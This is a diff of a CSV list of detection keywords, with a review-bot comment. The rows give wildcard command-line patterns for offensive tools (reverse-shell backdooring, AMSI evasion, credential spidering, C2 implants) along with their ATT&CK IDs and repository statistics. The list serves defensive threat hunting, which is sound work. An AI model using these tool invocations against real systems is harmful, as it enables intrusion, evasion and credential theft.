tools","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" "* exec-command -shell*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" 
@@ -599,35 +599,35 @@ "* --execution false --save True --output *.bin*","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/senzee1984/micr0_shell","1","0","N/A","9","1","91","12","2023-09-16T02:35:28Z","2023-08-13T02:46:51Z" "* exegol.apk*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "* exegol.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"* exe-selfdelete*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"* exe-selfdelete*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" "* Exfil.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and 
love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" "* exfiltrate.exe*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","0","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" "* Exrop(*/bin/*","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tools","https://github.com/d4em0n/exrop","1","0","N/A","N/A","3","265","26","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z" -"* extract --secrets --zsh*","offensive_tool_keyword","PassDetective","PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API keys and secrets","T1059 - T1059.004 - T1552 - T1552.001","TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/aydinnyunus/PassDetective","1","0","N/A","7","1","51","3","2023-08-16T16:51:15Z","2023-07-22T12:31:57Z" +"* extract --secrets --zsh*","offensive_tool_keyword","PassDetective","PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API keys and secrets","T1059 - T1059.004 - T1552 - T1552.001","TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/aydinnyunus/PassDetective","1","0","N/A","7","1","52","3","2023-08-16T16:51:15Z","2023-07-22T12:31:57Z" "* --extra-verbose*","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 
- T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","blackcat ransomware","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -f *.bin -e AMSI*","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","N/A","N/A","8","781","86","2023-04-04T03:06:16Z","2020-10-08T11:22:26Z" "* -f *.bin -e Defender*","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","N/A","N/A","8","781","86","2023-04-04T03:06:16Z","2020-10-08T11:22:26Z" "* -f *.exe --encrypt xor --jmp -o *.exe*","offensive_tool_keyword","darkarmour","Store and execute an encrypted windows binary from inside memorywithout a single bit touching disk.","T1055.012 - T1027 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/darkarmour","1","0","N/A","10","7","644","119","2020-04-13T10:56:23Z","2020-04-06T20:48:20Z" -"* -f *.exe -m onionduke -b *.dll*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3185","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" -"* -f *.exe -m onionduke -b *.exe*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - 
TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3185","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" -"* -f *.ps1 -l 3 -o *.ps1 -v -t powershell*reverse*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1187","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"* -f *.exe -m onionduke -b *.dll*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"* -f *.exe -m onionduke -b *.exe*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"* -f *.ps1 -l 3 -o *.ps1 -v -t powershell*reverse*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" "* -f Find-AllVulns*","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - 
TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","185","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" "* -f Find-PathDLLHijack*","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","185","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" "* -f Get-DomainGroupMember* -a *-Identity *admin* -Recurse*","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","185","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" "* -f Invoke-Inveigh*","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","185","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" -"* -f kirbi *","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","2","900","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" -"* -f passw -e xlsx csv *","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. 
Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","772","119","2023-10-03T03:50:49Z","2020-03-18T13:27:20Z" -"* -f passw user admin account network login logon cred *","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","772","119","2023-10-03T03:50:49Z","2020-03-18T13:27:20Z" -"* -f psexec.exe -H * -P * -s reverse_shell_tcp*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3185","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" -"* -f shells/generic1.ps1 *","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1187","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" -"* -f tcpview.exe -s iat_reverse_tcp_inline -H * -P * -m automatic -C*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3185","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" -"* -f TeamViewer.exe -H * -P * -s 
*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3185","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"* -f kirbi *","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","10","902","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" +"* -f passw -e xlsx csv *","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" +"* -f passw user admin account network login logon cred *","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. 
Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" +"* -f psexec.exe -H * -P * -s reverse_shell_tcp*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"* -f shells/generic1.ps1 *","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"* -f tcpview.exe -s iat_reverse_tcp_inline -H * -P * -m automatic -C*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"* -f TeamViewer.exe -H * -P * -s *","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" "* -FakeCmdLine *","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - 
T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","0","N/A","10","10","21","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z" -"* -FakeCmdLine *","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","0","N/A","N/A","10","1069","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"* -FakeCmdLine *","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. 
The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","0","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" "* -FakeDC * -SamAccountName * -Username *","offensive_tool_keyword","AD exploitation cheat sheet","DCShadow is an attack that masks certain actions by temporarily imitating a Domain Controller. If you have Domain Admin or Enterprise Admin privileges in a root domain it can be used for forest-level persistence.","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* fcrdns.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --file ownedusers.txt*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"* --file-smuggler-port *","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","N/A","10","10","3252","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"* --file-smuggler-port *","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" "* filetransfer -download -src-file *.exe*/tmp*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" "* filetransfer -upload -src-file *.exe*\temp*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" "* FileZillaPwd*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" 
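Review bot: The re-added nimplant row in this hunk (`* exe-selfdelete*`) still carries a hyphenated sub-technique ID, `T1059-001`, and lists `TA0002` twice in its tactics field, while the other rows in the hunk use the dotted form such as `T1059.001`. Since the line is rewritten anyway for the star and fork counts, I would normalise the two fields to `"T1059.001 - T1027 - T1036","TA0002 - TA0005"`. A consumer that splits on ` - ` and joins against ATT&CK IDs would presumably fail to map the hyphenated value, which weakens technique-based triage of hits on this keyword. The krbrelayx row's popularity score also moves from 2 to 10 while its star count only goes from 900 to 902, so it is worth confirming that this is a deliberate correction and not a scoring artefact.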
@@ -639,22 +639,22 @@ "* -fluctuate=NA -sleep=*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" "* -fluctuate=RW -sleep=*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 
- TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" "* flume-master-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* --flush-attacks*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z" +"* --flush-attacks*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" "* follina.py *","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/ItsNee/Follina-CVE-2022-30190-POC","1","0","N/A","N/A","1","5","0","2022-07-04T13:27:13Z","2022-06-05T13:54:04Z" -"* -force-forwardable","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"* --force-kerb *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* --force-ps32","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -force-forwardable","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"* --force-kerb *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* --force-ps32","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
